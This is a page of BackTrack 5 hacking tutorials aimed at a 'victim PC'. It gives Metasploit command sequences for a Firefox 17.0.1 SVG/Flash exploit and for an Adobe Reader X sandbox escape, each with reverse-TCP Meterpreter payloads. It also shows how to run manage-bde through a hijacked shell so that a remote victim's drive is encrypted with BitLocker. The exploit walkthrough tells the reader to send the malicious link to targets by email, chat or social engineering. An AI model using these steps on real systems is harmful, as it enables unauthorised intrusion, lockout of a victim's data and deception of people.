BackTrack 5 Tutorials

How to Encrypt Drive of Remote Victim PC

0

First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell‘command to get command prompt of  the target.

Type manage-bde -status and press Enter.

Run the following command to enable BitLocker on your desired PC drive (in my case g drive), store the recovery key on the c:/windows/system drive, and generate a random recovery password

manage-bde -on g:  -RecoveryKey c:/windows/system  -RecoveryPassword

Best of Social Engineering Toolkit Attack

0

Bypassing Antivirus using Multi Pyinjector Shell Code Injection

Browser Autopwn Attack

Web Jacking Method

Create a Payload and Listener Attack

Infectious Media Generator Attack

Tab Napping Attack Method

Powershell Attack Vector Method

RATTE (Remote Administration Tool) Attack Method

PyInjector Shellcode Injection Attack 

Hack Windows, Linux or MAC PC using Firefox 17.0.1 + Flash Privileged Code Injection

1

This exploit gains remote code execution on Firefox 17.0.1 and all previous versions provided the user has installed Flash. No memory corruption is used. First, a Flash object is cloned into the anonymous content of the SVG “use” element in the <body> (CVE-2013-0758). From there, the Flash object can navigate a child frame to a URL in the chrome:// scheme. Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper around the child frame’s window reference and inject code into the chrome:// context. Once we have injection into the chrome execution context, we can write the payload to disk, chmod it (if posix), and then execute. Note: Flash is used here to trigger the exploit but any Firefox plugin with script access should be able to trigger it.

Exploit Targets

Firefox 17.0.1

Windows PC

Linux PC

MAC OS X PC

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/multi/browser/firefox_svg_plugin

msf exploit (firefox_svg_plugin)>set payload windows/meterpreter/reverse_tcp

msf exploit (firefox_svg_plugin)>set lhost 192.168.1.167 (IP of Local Host)

msf exploit (firefox_svg_plugin)>set srvhost 192.168.1.167 (This must be an address on the local machine)

msf exploit (firefox_svg_plugin)>set uripath / (The Url to use for this exploit)

msf exploit (firefox_svg_plugin)>exploit

Now an URL you should give to your victim http://192.168.1.167:8080/

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Hack Remote Windows PC Using AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass

0

This module exploits vulnerability on Adobe Reader X Sandbox. The vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe process to write register values which can be used to trigger a buffer overflow on the AdobeCollabSync component, allowing achieving Medium Integrity Level privileges from a Low Integrity AcroRd32.exe process. This module has been tested successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.

Exploit Targets

Adobe Reader X 10.1.4

Windows 7

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘ps‘command displays a list of running processes on the target.

Migrate to the AcroRd32 sandboxed process

Now type use exploit/windows/local/adobe_sandbox_adobecollabsync

msf exploit (adobe_sandbox_adobecollabsync)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_sandbox_adobecollabsync)>set lhost 192.168.1.2 (IP of Local Host)

msf exploit (adobe_sandbox_adobecollabsync)>set session 1

msf exploit (adobe_sandbox_adobecollabsync)>exploit

Go to Top